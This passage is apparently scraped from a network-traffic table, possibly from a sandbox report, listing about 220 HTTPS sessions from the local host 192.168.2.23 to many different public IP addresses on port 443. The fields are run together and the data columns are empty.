                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9967192.168.2.2349792126.158.98.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9968192.168.2.2355090157.144.115.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9969192.168.2.2334940151.63.237.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9970192.168.2.235755654.62.82.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9971192.168.2.234751471.48.165.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9972192.168.2.2334810146.174.239.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9973192.168.2.23454321.203.148.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9974192.168.2.234670868.182.213.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9975192.168.2.2335290163.111.228.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9976192.168.2.2334348189.243.1.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9977192.168.2.2351720143.199.58.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9978192.168.2.234527623.238.134.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9979192.168.2.2346768190.51.188.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9980192.168.2.2360256102.64.28.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9981192.168.2.2349502150.34.36.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9982192.168.2.2339186103.179.205.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9983192.168.2.2342204125.103.37.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9984192.168.2.2343302163.56.81.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9985192.168.2.2343180136.37.178.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9986192.168.2.234639474.96.28.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9987192.168.2.235310290.140.183.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9988192.168.2.2337898139.16.131.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9989192.168.2.2353712140.62.166.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9990192.168.2.233791445.88.25.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9991192.168.2.234508047.22.235.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9992192.168.2.2339078202.96.114.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9993192.168.2.2353050147.2.25.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9994192.168.2.2334318200.36.111.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9995192.168.2.2333304146.28.237.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9996192.168.2.2343152156.133.55.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9997192.168.2.2347362143.250.192.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9998192.168.2.234609471.92.106.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9999192.168.2.2341960133.7.175.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10000192.168.2.2338462110.175.253.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10001192.168.2.235284840.222.135.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10002192.168.2.235635844.10.235.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10003192.168.2.2356574193.209.248.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10004192.168.2.2344210194.70.175.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10005192.168.2.2346328140.205.132.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10006192.168.2.2350060168.172.73.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10007192.168.2.2339680198.70.83.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10008192.168.2.2352796196.12.231.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10009192.168.2.2341388118.81.241.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10010192.168.2.233553081.218.178.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10011192.168.2.234763868.44.155.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10012192.168.2.234860441.229.189.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10013192.168.2.233502058.46.30.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10014192.168.2.234689639.199.111.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10015192.168.2.235174243.60.197.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10016192.168.2.2349352109.239.148.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10017192.168.2.23537141.126.234.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10018192.168.2.234345891.142.16.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10019192.168.2.234067468.153.23.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10020192.168.2.2353560152.237.186.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10021192.168.2.2357282208.0.192.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10022192.168.2.2336670132.80.79.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10023192.168.2.235531081.19.25.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10024192.168.2.236017843.14.80.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10025192.168.2.23375105.88.189.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10026192.168.2.234174831.100.9.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10027192.168.2.2343782179.21.23.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10028192.168.2.234392813.124.16.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10029192.168.2.2337698147.171.133.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10030192.168.2.235255886.206.243.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10031192.168.2.236099467.242.186.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10032192.168.2.2335232146.12.229.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10033192.168.2.235272814.150.134.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10034192.168.2.2337576143.150.135.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10035192.168.2.233595868.7.137.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10036192.168.2.2347420124.93.107.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10037192.168.2.2345744140.136.221.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10038192.168.2.2360836184.34.204.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10039192.168.2.2354388105.117.112.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10040192.168.2.234002841.134.162.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10041192.168.2.235961658.218.100.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10042192.168.2.235245067.220.186.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10043192.168.2.2355542132.9.203.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10044192.168.2.23571882.120.78.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10045192.168.2.2350818101.153.40.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10046192.168.2.2356408160.28.49.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10047192.168.2.2345542133.255.4.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10048192.168.2.2356476142.53.102.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10049192.168.2.2352698171.160.71.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10050192.168.2.233966025.4.71.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10051192.168.2.233958423.67.215.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10052192.168.2.235169237.248.196.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10053192.168.2.2333986153.116.11.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10054192.168.2.2349908154.216.56.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10055192.168.2.2360648208.74.185.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10056192.168.2.235852489.9.155.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10057192.168.2.235128248.7.22.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10058192.168.2.2334490149.236.104.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10059192.168.2.2343380103.138.85.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10060192.168.2.2357374150.85.29.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10061192.168.2.234120088.203.163.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10062192.168.2.234692860.111.127.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10063192.168.2.233688057.209.187.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10064192.168.2.233725252.225.135.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10065192.168.2.2344362164.57.33.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10066192.168.2.2339666133.92.163.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10067192.168.2.2355436181.177.4.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10068192.168.2.2339426173.166.6.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10069192.168.2.233832014.136.20.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10070192.168.2.234793085.103.81.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10071192.168.2.235213883.2.75.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10072192.168.2.2360152169.28.194.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10073192.168.2.2340986183.243.59.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10074192.168.2.2359894126.120.221.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10075192.168.2.2346008191.70.28.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10076192.168.2.234322047.160.150.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10077192.168.2.23429945.255.225.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10078192.168.2.2349866143.158.14.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10079192.168.2.235980245.45.94.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10080192.168.2.2345170205.140.254.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10081192.168.2.2340008194.61.189.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10082192.168.2.235123024.197.212.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10083192.168.2.234653852.156.60.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10084192.168.2.2347518218.29.227.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10085192.168.2.2341984172.168.64.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10086192.168.2.2354144202.234.155.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10087192.168.2.236095642.240.220.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10088192.168.2.2340668116.226.150.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10089192.168.2.235961018.100.21.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10090192.168.2.234334491.95.172.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10091192.168.2.2352404158.18.81.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10092192.168.2.2349162173.179.237.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10093192.168.2.2347326177.66.189.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10094192.168.2.2341528219.184.126.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10095192.168.2.23429021.89.147.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10096192.168.2.2359072120.87.254.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10097192.168.2.233728260.224.44.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10098192.168.2.2351506168.176.99.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10099192.168.2.233276840.233.204.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10100192.168.2.2336890222.64.62.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10101192.168.2.2355198137.6.190.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10102192.168.2.2340160145.82.222.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10103192.168.2.2349632156.27.169.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10104192.168.2.233533690.83.92.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10105192.168.2.235626643.248.140.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10106192.168.2.2333246156.224.63.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10107192.168.2.234714646.217.107.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10108192.168.2.2334286213.178.25.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10109192.168.2.233391683.97.217.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10110192.168.2.2358766120.62.86.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10111192.168.2.235020438.200.48.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10112192.168.2.233323470.36.52.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10113192.168.2.235853441.197.85.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10114192.168.2.233728225.166.159.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10115192.168.2.235285834.229.28.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10116192.168.2.2339660212.187.232.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10117192.168.2.235005085.191.0.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10118192.168.2.2332952199.237.197.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10119192.168.2.2333848208.174.194.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10120192.168.2.2354334198.246.113.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10121192.168.2.233927069.213.216.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10122192.168.2.235693297.222.251.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10123192.168.2.234610058.135.68.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10124192.168.2.233833665.0.222.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10125192.168.2.235142887.209.176.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10126192.168.2.234797066.159.16.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10127192.168.2.2357018128.50.118.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10128192.168.2.2341018121.174.174.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10129192.168.2.234974683.190.104.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10130192.168.2.234031058.155.248.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10131192.168.2.2357652118.45.49.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10132192.168.2.233483659.32.73.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10133192.168.2.2352122128.217.166.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10134192.168.2.2356850156.31.228.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10135192.168.2.2345088173.46.121.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10136192.168.2.2348062212.154.249.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10137192.168.2.234180868.97.102.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10138192.168.2.2350398186.102.251.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10139192.168.2.2335822146.224.105.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10140192.168.2.233596082.182.170.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10141192.168.2.2341128115.179.213.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10142192.168.2.235450070.5.58.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10143192.168.2.235277895.29.94.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10144192.168.2.233488498.153.254.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10145192.168.2.233861481.131.7.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10146192.168.2.233314454.102.212.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10147192.168.2.235079414.10.222.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10148192.168.2.2334104103.146.1.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10149192.168.2.2347770153.66.218.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10150192.168.2.2334468209.219.35.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10151192.168.2.2358920121.31.187.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10152192.168.2.234354462.252.69.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10153192.168.2.2340044147.171.128.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10154192.168.2.2359990167.119.110.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10155192.168.2.234311873.50.87.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10156192.168.2.234487079.102.0.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10157192.168.2.234278871.209.188.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10158192.168.2.2336238138.11.227.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10159192.168.2.2350564104.201.97.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10160192.168.2.235302267.83.179.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10161192.168.2.2337276191.9.129.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10162192.168.2.2347542113.135.212.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10163192.168.2.2350096219.49.203.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10164192.168.2.2352362137.174.255.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10165192.168.2.2336552185.15.111.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10166192.168.2.2341210110.200.19.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10167192.168.2.234390835.93.139.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10168192.168.2.2349056118.214.201.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10169192.168.2.2350662104.208.159.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10170192.168.2.235220699.133.176.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10171192.168.2.2354652144.60.200.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10172192.168.2.2353350102.210.123.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10173192.168.2.235525474.116.9.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10174192.168.2.233610889.62.210.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10175192.168.2.234627298.109.0.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10176192.168.2.2348408203.128.251.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10177192.168.2.2333228178.119.83.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10178192.168.2.234373843.35.7.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10179192.168.2.235270050.181.47.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10180192.168.2.235905644.132.113.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10181192.168.2.2347494210.87.237.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10182192.168.2.234227287.47.218.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10183192.168.2.234665491.240.114.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10184192.168.2.2355036113.186.220.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10185192.168.2.2351080190.74.226.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10186192.168.2.23477602.232.44.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10187192.168.2.234987499.28.50.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10188192.168.2.234735612.144.96.65443
